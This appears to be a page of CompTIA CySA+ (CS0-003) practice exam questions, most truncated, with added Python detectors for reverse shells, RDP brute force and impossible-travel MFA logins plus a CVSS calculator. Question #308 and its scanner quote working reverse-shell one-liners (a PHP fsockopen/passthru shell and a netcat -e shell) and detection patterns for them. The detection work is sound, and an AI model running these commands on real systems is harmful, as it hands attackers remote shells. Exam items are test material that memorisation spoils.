CS0-003 Exam Questions
658 real CS0-003 exam questions with expert-verified answers and explanations. Page 7 of 14.
- Question #304 Incident Response and Management
A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has au...
Tags: Incident Response, Malware Analysis, Threat Intelligence, EDR

- Question #305 Security Operations
A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?
Tags: Network Traffic Analysis, Port 1433, Database Replication, Security Operations Center (SOC)

- Question #306 Vulnerability Management
Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?
Tags: Risk register, Risk management, Vulnerability management, Threat management

- Question #308 Security Operations
While reviewing web server logs, a security analyst discovers the following suspicious line: php -r '$socket=fsockopen("10.0.0.1", 1234); passthru ("/bin/sh -i <&3 >&3 2>&3");' Whi...
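The one-liner above uses fsockopen() to open an outbound TCP connection from the web server to 10.0.0.1:1234, which becomes file descriptor 3 of the PHP process, and then passthru() runs an interactive /bin/sh with stdin, stdout and stderr all redirected to that descriptor, so whoever listens on 10.0.0.1:1234 gets a shell on the server. Below is an added Python example, not part of the original question page, that scans a few constructed Apache-style access-log lines for this and other common reverse-shell forms; the second constructed line carries the question's command URL-encoded as it would appear in a query string. The log lines, the indicator names and the pattern set are illustrative assumptions, not a vendor rule set.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format access log lines (illustrative; not taken from
# the original question). Line 2 carries the question's PHP one-liner URL-encoded
# in a query string; line 4 carries a netcat variant.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2024:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2024:13:55:41 +0000] "GET /upload.php?cmd=php+-r+%27%24socket%3Dfsockopen%28%2210.0.0.1%22%2C+1234%29%3B+passthru+%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27 HTTP/1.1" 200 18 "-" "curl/8.0"
198.51.100.4 - - [10/May/2024:13:56:02 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [10/May/2024:13:56:09 +0000] "GET /shell?c=nc+-e+/bin/sh+198.51.100.4+4444 HTTP/1.1" 404 0 "-" "python-requests/2.31"
"""

# Indicator names are our own labels. Patterns run against the URL-decoded request
# target, so percent-encoding or '+' for spaces alone does not evade them.
REVERSE_SHELL_PATTERNS = {
    # fsockopen() opens the outbound socket; passthru()/exec()/... then attach a shell to it
    "php fsockopen + command execution": re.compile(
        r"fsockopen\s*\(.*?\)\s*;.*?\b(passthru|exec|shell_exec|system|popen|proc_open)\b", re.I),
    # '/bin/sh -i <&3 >&3 2>&3': interactive shell with stdin/stdout/stderr on fd 3 (the socket)
    "interactive sh bound to a file descriptor": re.compile(
        r"/bin/(?:ba)?sh\s+-i\s+<&\d+\s*>&\d+\s*2>&\d+"),
    "bash /dev/tcp reverse shell": re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d{1,5}"),
    "netcat -e reverse shell": re.compile(r"\bnc(?:at)?\s+(?:-\w+\s+)*-e\s+/bin/(?:ba)?sh", re.I),
}

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_request(line):
    """Return the URL-decoded request target of an access-log line, or None if it has none."""
    m = REQUEST_RE.search(line)
    return unquote_plus(m.group("target")) if m else None


def scan_web_log(text):
    """Scan access-log text; return one finding per line that matches any reverse-shell indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        decoded = decode_request(line)
        if decoded is None:
            continue
        hits = [name for name, pat in REVERSE_SHELL_PATTERNS.items() if pat.search(decoded)]
        if hits:
            findings.append({
                "line": lineno,
                "src_ip": line.split(" ", 1)[0],   # first field of the combined log format
                "indicators": hits,
                "request": decoded,
            })
    return findings


if __name__ == "__main__":
    for f in scan_web_log(SAMPLE_LOG):
        print(f"line {f['line']} from {f['src_ip']}: {', '.join(f['indicators'])}")
        print("    ", f["request"])
```

Matching on the decoded request is the important design choice: attackers routinely percent-encode or double-encode payloads, and a rule that greps the raw line for "fsockopen" misses them. A hit like this should be treated as command execution already achieved, not as an attempted attack, so the next step is containment of the web server and a search for the listener address in outbound connection logs.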
Tags: Reverse shell, Command execution, Web server security, Network exploitation

- Question #309 Incident Response and Management
Which of the following should be updated after a lessons-learned review?
Tags: Lessons learned, Incident response plan, Post-incident review, Plan update

- Question #310 Vulnerability Management
A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effec...
Tags: Application Security, Secure Software Development Life Cycle, Code Review, OWASP

- Question #311 Security Operations
An analyst suspects cleartext passwords are being sent over the network. Which of the following tools would best support the analyst's investigation?
Tags: Network traffic analysis, Packet capture, Wireshark, Security tools

- Question #312 Security Operations
Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization...
Tags: Cyber Kill Chain, Weaponization, Threat Actor Tactics, Endpoint Security Evasion

- Question #314 Vulnerability Management
A security analyst reviews the following Arachni scan results for a web application that stores PII data: Which of the following should be remediated first?
Tags: Web application security, SQL injection, PII, Vulnerability prioritization

- Question #315 Vulnerability Management
Which of the following stakeholders are most likely to receive a vulnerability scan report? (Choose two.)
Tags: Vulnerability reports, Stakeholder communication, Vulnerability scanning

- Question #316 Security Operations
Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?
Tags: SOC operations, Alert fatigue, SOAR, Automation

- Question #317 Vulnerability Management
An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the followi...
Tags: Vulnerability reappearance, Remediation, Database security, Root cause analysis

- Question #318 Vulnerability Management
A company has decided to expose several systems to the internet. The systems are currently available internally only. A security analyst is using a subset of CVSS3.1 exploitability...
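Exposing an internal-only system to the internet usually changes one thing in an existing CVSS v3.1 vector: an Attack Vector of Adjacent (AV:A) becomes Network (AV:N), which raises the exploitability sub-score and therefore the base score. The following is an added Python example, not from the question page, that computes the v3.1 exploitability sub-score (8.22 x AV x AC x PR x UI, with the metric weights from the CVSS v3.1 specification) for each finding as scored today and again as it would score once internet-facing, and ranks findings by how much exploitability the exposure adds. The finding names and vectors are constructed for illustration and are not real CVEs.

```python
import re

# Metric weights from the CVSS v3.1 specification (section 7.4, "Metric Values").
# Privileges Required carries a higher weight when Scope is Changed.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.20}
AC = {"L": 0.77, "H": 0.44}
PR_SCOPE_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_SCOPE_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.50}
UI = {"N": 0.85, "R": 0.62}

# Constructed findings for illustration; names and vectors are not real CVEs.
FINDINGS = {
    "web-app auth bypass": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
    "db admin console RCE": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
    "local kernel priv-esc": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
}


def parse_vector(vector):
    """Split a v3.1 vector string into {metric: value}; the 'CVSS:3.1/' prefix is optional."""
    parts = vector.split("/")
    if parts[0].startswith("CVSS:"):
        parts = parts[1:]
    metrics = dict(p.split(":", 1) for p in parts)
    missing = [m for m in ("AV", "AC", "PR", "UI", "S") if m not in metrics]
    if missing:
        raise ValueError(f"vector {vector!r} lacks {missing}")
    return metrics


def exploitability(vector):
    """CVSS v3.1 exploitability sub-score: 8.22 x AV x AC x PR x UI (unrounded)."""
    m = parse_vector(vector)
    pr = (PR_SCOPE_CHANGED if m["S"] == "C" else PR_SCOPE_UNCHANGED)[m["PR"]]
    return 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr * UI[m["UI"]]


def rescore_as_internet_facing(vector):
    """Model the exposure change: an Adjacent-network vector becomes Network-reachable.
    Local and Physical vectors are left alone, since putting a host on the internet
    does not by itself make a local-only bug remotely reachable."""
    return re.sub(r"\bAV:A\b", "AV:N", vector)


def exposure_deltas(findings):
    """Rank findings by the exploitability gained from internet exposure (rounded to 1 decimal)."""
    rows = []
    for name, vec in findings.items():
        now = exploitability(vec)
        exposed = exploitability(rescore_as_internet_facing(vec))
        rows.append({"name": name, "current": round(now, 1),
                     "if_exposed": round(exposed, 1), "delta": round(exposed - now, 1)})
    return sorted(rows, key=lambda r: (r["delta"], r["if_exposed"]), reverse=True)


if __name__ == "__main__":
    for row in exposure_deltas(FINDINGS):
        print(f"{row['name']:24} now {row['current']}  exposed {row['if_exposed']}  +{row['delta']}")
```

The maximum exploitability sub-score (AV:N/AC:L/PR:N/UI:N) is about 3.9, so a finding that already sits near it gains nothing from exposure, while an AV:A finding with no privileges or user interaction required jumps the most. Only the exploitability factors are recomputed here; the impact sub-score is unchanged by where the host sits, which is exactly why a subset of the exploitability metrics is the right lens for this re-prioritisation.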
Tags: Vulnerability prioritization, CVSS, Threat exposure, Internet-facing systems

- Question #319 Incident Response and Management
During an incident in which a user machine was compromised, an analyst recovered a binary file that potentially caused the exploitation. Which of the following techniques could be...
Tags: Malware analysis, Static analysis, Binary analysis, Incident response

- Question #320 Vulnerability Management
A leader on the vulnerability management team is trying to reduce the team's workload by automating some simple but time-consuming tasks. Which of the following activities should t...
Tags: Vulnerability management, Automation, Workload reduction, Agent health checks

- Question #321 Reporting and Communication
The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools...
Tags: Cybersecurity frameworks, ISO 27001, Information security management, Governance

- Question #322 Incident Response and Management
A high volume of failed RDP authentication attempts was logged on a critical server within a one-hour period. All of the attempts originated from the same remote IP address and ma...
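The pattern in this question (many failed RDP logons against one host, from one source, inside a short window) is the classic password-guessing signature. The following is an added Python example, not from the question page, that builds a constructed set of Windows Security events (Event ID 4625, LogonType 10 for RemoteInteractive/RDP; the original question does not show its log) and runs a sliding one-hour window per host and source IP, raising one alert when a failure threshold is crossed. The threshold, host name and addresses are illustrative assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(hours=1)   # the question's observation window
THRESHOLD = 20                # failures per (host, source IP) inside the window; tune per environment


def build_sample_events():
    """Constructed Windows Security events (illustrative; the original question shows no log).
    4625 = failed logon, 4624 = successful logon; LogonType 10 = RemoteInteractive (RDP)."""
    base = datetime(2024, 5, 10, 2, 0, 0)
    events = []
    # 25 failures in 25 minutes from one remote IP, cycling through guessed admin names
    for i in range(25):
        events.append({"event_id": 4625, "logon_type": 10, "time": base + timedelta(minutes=i),
                       "src_ip": "198.51.100.9", "user": f"admin{i % 5}", "host": "critical-srv01"})
    # a legitimate user mistyping a password a few times, then succeeding
    for i in range(3):
        events.append({"event_id": 4625, "logon_type": 10, "time": base + timedelta(minutes=10 * i),
                       "src_ip": "10.0.0.5", "user": "jdoe", "host": "critical-srv01"})
    events.append({"event_id": 4624, "logon_type": 10, "time": base + timedelta(minutes=40),
                   "src_ip": "10.0.0.5", "user": "jdoe", "host": "critical-srv01"})
    return events


def detect_rdp_bruteforce(events, threshold=THRESHOLD, window=WINDOW):
    """Sliding-window count of failed RDP logons per (host, source IP).
    Returns one alert per pair, raised at the moment the threshold is first crossed."""
    recent = defaultdict(deque)
    alerts = {}
    for e in sorted(events, key=lambda e: e["time"]):
        if e["event_id"] != 4625 or e["logon_type"] != 10:
            continue
        key = (e["host"], e["src_ip"])
        q = recent[key]
        q.append(e)
        while e["time"] - q[0]["time"] > window:   # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and key not in alerts:
            alerts[key] = {
                "host": e["host"], "src_ip": e["src_ip"], "failures": len(q),
                "distinct_users": len({x["user"] for x in q}),
                "first": q[0]["time"].isoformat(), "last": e["time"].isoformat(),
            }
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(build_sample_events()):
        print(alert)
```

The distinct-user count is worth carrying in the alert: many failures against one account point at password guessing that an account lockout threshold will blunt, while a few attempts spread across many accounts (password spraying) sails under per-account lockout and is better stopped at the source address or by not exposing RDP directly at all.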
Tags: Brute-force attack, Account lockout, Authentication security, Mitigation controls

- Question #323 Incident Response and Management
An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security services and p...
Tags: Malware Analysis, Digital Forensics, Incident Response, Root Cause Analysis

- Question #324 Security Operations
When undertaking a cloud migration of multiple SaaS applications, an organization's systems administrators struggled with the complexity of extending identity and access management...
Tags: Cloud Security, IAM, Zero Trust, ZTNA

- Question #325 Vulnerability Management
A security analyst reviews the following extract of a vulnerability scan that was performed against the web server: Which of the following recommendations should the security analy...
Tags: Web Server Hardening, Vulnerability Management, Information Disclosure, Security Configuration

- Question #326 Incident Response and Management
A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst should properly docu...
Tags: Incident documentation, Evidence collection, Physical security incident, Incident response procedures

- Question #327 Security Operations
A cybersecurity analyst is participating with the DLP project team to classify the organization's data. Which of the following is the primary purpose for classifying data?
Tags: Data Classification, DLP, Data Governance, Information Security

- Question #328 Security Operations
A security analyst observed the following activity from a privileged account: - Accessing emails and sensitive information - Audit logs being modified - Abnormal log-in times Which...
Tags: Insider threat, Privileged account compromise, Abnormal behavior, Audit log modification

- Question #329 Vulnerability Management
A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mitigation. Which of t...
Tags: Vulnerability prioritization, Threat intelligence, IoCs, Adversary campaigns

- Question #330 Security Operations
A security analyst received an alert regarding multiple successful MFA log-ins for a particular user. When reviewing the authentication logs, the analyst sees the following: Which...
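Multiple successful MFA logins for one user are only suspicious in context, and the context that usually decides it is geography: two successes minutes apart from places no aircraft could connect is impossible travel, and it is a common signature of an attacker who got a victim to approve a push prompt. The following is an added Python example, not from the question page (which does not reproduce its log excerpt), that runs an impossible-travel check over constructed, GeoIP-enriched authentication events using the haversine great-circle distance and a maximum plausible speed. Users, addresses, coordinates and the speed threshold are illustrative assumptions.

```python
from datetime import datetime, timezone
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0
MAX_PLAUSIBLE_KMH = 900.0   # about airliner cruise speed; anything faster is "impossible travel"

# Constructed, geo-enriched authentication events (illustrative; not the log from the question).
# In a real pipeline the coordinates come from a GeoIP lookup on src_ip; here they are embedded.
AUTH_EVENTS = [
    {"user": "jdoe",   "time": "2024-05-10T09:00:00Z", "src_ip": "203.0.113.10",  "lat": 40.7128, "lon": -74.0060, "result": "MFA_SUCCESS"},
    {"user": "jdoe",   "time": "2024-05-10T09:20:00Z", "src_ip": "198.51.100.23", "lat": 55.7558, "lon": 37.6173,  "result": "MFA_SUCCESS"},
    {"user": "asmith", "time": "2024-05-10T09:00:00Z", "src_ip": "203.0.113.11",  "lat": 40.7128, "lon": -74.0060, "result": "MFA_SUCCESS"},
    {"user": "asmith", "time": "2024-05-10T13:00:00Z", "src_ip": "192.0.2.44",    "lat": 42.3601, "lon": -71.0589, "result": "MFA_SUCCESS"},
    {"user": "asmith", "time": "2024-05-10T13:05:00Z", "src_ip": "192.0.2.44",    "lat": 42.3601, "lon": -71.0589, "result": "MFA_DENIED"},
]


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two WGS84 points, in kilometres."""
    phi1, phi2 = radians(lat1), radians(lat2)
    dphi = radians(lat2 - lat1)
    dlam = radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(phi1) * cos(phi2) * sin(dlam / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def parse_time(stamp):
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def find_impossible_travel(events, max_kmh=MAX_PLAUSIBLE_KMH):
    """Compare each successful MFA login with the same user's previous success;
    alert when the speed implied by distance and elapsed time exceeds max_kmh."""
    successes = {}
    for e in sorted(events, key=lambda e: parse_time(e["time"])):
        if e["result"] != "MFA_SUCCESS":
            continue
        successes.setdefault(e["user"], []).append(e)
    alerts = []
    for user, evs in successes.items():
        for prev, cur in zip(evs, evs[1:]):
            dist = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            hours = (parse_time(cur["time"]) - parse_time(prev["time"])).total_seconds() / 3600
            # two logins at the same instant from different places are impossible as well
            speed = dist / hours if hours > 0 else (float("inf") if dist > 0 else 0.0)
            if speed > max_kmh:
                alerts.append({"user": user, "from_ip": prev["src_ip"], "to_ip": cur["src_ip"],
                               "distance_km": round(dist), "hours": round(hours, 2), "kmh": round(speed)})
    return alerts


if __name__ == "__main__":
    for alert in find_impossible_travel(AUTH_EVENTS):
        print(alert)
```

Geo-velocity is one signal, not a verdict: VPN exits and mobile carriers produce false positives, so the alert should be enriched with the count of push prompts the user received in the same window and with whether the second session's device is one the user has used before. A confirmed hit from a push-fatigue or push-phishing campaign calls for revoking the user's sessions and tokens, not just a password reset, because the attacker already holds a valid session.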
Tags: MFA attacks, Push phishing, Impossible geo-velocity, Authentication logs

- Question #331 Security Operations
A security analyst has identified a new malware file that has impacted the organization. The malware is polymorphic and has built-in conditional triggers that require a connection...
Tags: Malware analysis, Sandbox environment, Polymorphic malware, Secure analysis

- Question #332 Vulnerability Management
Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?
Tags: Threat modeling, OWASP, Application security

- Question #333 Incident Response and Management
Which of the following would an organization use to develop a business continuity plan?
Tags: Business continuity plan, Critical systems, Prioritization

- Question #334 Reporting and Communication
The management team requests monthly KPI reports on the company's cybersecurity program. Which of the following KPIs would identify how long a security threat goes unnoticed in the...
Tags: KPIs, Security metrics, Mean time to detect, Threat detection

- Question #335 Security Operations
Which of the following best describes the key elements of a successful information security program?
Tags: Information security program, Security policy, Roles and responsibilities, Asset management

- Question #337 Security Operations
Which of the following is a nation-state actor least likely to be concerned with?
Tags: Nation-state actors, Threat actors, Adversary motivations, Legal action

- Question #338 Security Operations
Which of the following is a commonly used four-component framework to communicate threat actor behavior?
Tags: Threat intelligence frameworks, Diamond Model, Threat actor behavior

- Question #339 Security Operations
An employee downloads a freeware program to change the desktop to the classic look of legacy Windows. Shortly after the employee installs the program, a high volume of random DNS q...
Tags: Malware, DNS queries, Defense evasion, Persistence

- Question #340 Reporting and Communication
An organization discovered a data breach that resulted in PII being released to the public. During the lessons learned review, the panel identified discrepancies regarding who was...
Tags: Data breach, External reporting, Regulatory compliance, Lessons learned

- Question #341 Incident Response and Management
During an incident, a security analyst discovers a large amount of PII has been emailed externally from an employee to a public email address. The analyst finds that the external e...
Tags: Data exfiltration, PII, Incident response, Legal hold

- Question #342 Security Operations
Which of the following can be used to learn more about TTPs used by cybercriminals?
Tags: MITRE ATT&CK, TTPs, Threat intelligence

- Question #343 Security Operations
Which of the following statements best describes the MITRE ATT&CK framework?
Tags: MITRE ATT&CK, Threat intelligence framework, Attack frameworks

- Question #344 Vulnerability Management
A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target the company's business type may be able to breach the network and remai...
Tags: Adversary emulation, Red teaming, Threat actors

- Question #345 Security Operations
A security analyst receives an alert for suspicious activity on a company laptop. An excerpt of the log is shown below: Which of the following has most likely occurred?
Tags: Malicious macros, Log analysis, Attack vectors

- Question #346 Incident Response and Management
During an incident, some IoCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?
Tags: Incident response, Containment, Ransomware, IoCs

- Question #347 Reporting and Communication
An MSSP received several alerts from customer 1, which caused a missed incident response deadline for customer 2. Which of the following best describes the document that was violat...
Tags: SLA, Incident response metrics, Service agreements

- Question #348 Reporting and Communication
Which of the following is a reason proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?
Tags: Evidence handling, Legal reporting, Incident response

- Question #349 Security Operations
An attacker has just gained access to the syslog server on a LAN. Reviewing the syslog entries has allowed the attacker to prioritize possible next targets. Which of the following...
Tags: Passive reconnaissance, Footprinting, Syslog analysis

- Question #350 Security Operations
A security analyst observed the following activities in chronological order: 1. Protocol violation alerts on external firewall 2. Unauthorized internal scanning activity 3. Changes...
Tags: Data exfiltration, Network anomalies, Threat actor goals

- Question #351 Vulnerability Management
After reviewing the final report for a penetration test, a cybersecurity analyst prioritizes the remediation for input validation vulnerabilities. Which of the following attacks is...
Tags: Input validation, Cross-site scripting, Web vulnerabilities, Remediation

- Question #352 Vulnerability Management
During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate the vulnerability at...
Tags: Buffer overflow, Input validation, Application security

- Question #353 Incident Response and Management
The SOC received a threat intelligence notification indicating that an employee's credentials were found on the dark web. The user's web and log-in activities were reviewed for mal...
Tags: Compromised credentials, Incident response, Password reset, MFA

- Question #354 Vulnerability Management
A security analyst is working on a server patch management policy that will allow the infrastructure team to be informed more quickly about new patches. Which of the following woul...
Tags: Patch management, CVE details, Vulnerability remediation, Baseline configuration

- Question #355 Vulnerability Management
A Chief Information Security Officer (CISO) wants to disable a functionality on a business-critical web application that is vulnerable to RCE in order to maintain the minimum risk le...
Tags: Risk treatment, Risk mitigation, RCE vulnerability

- Question #356 Vulnerability Management
A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control....
Tags: Compensating controls, Authentication vulnerability, Security controls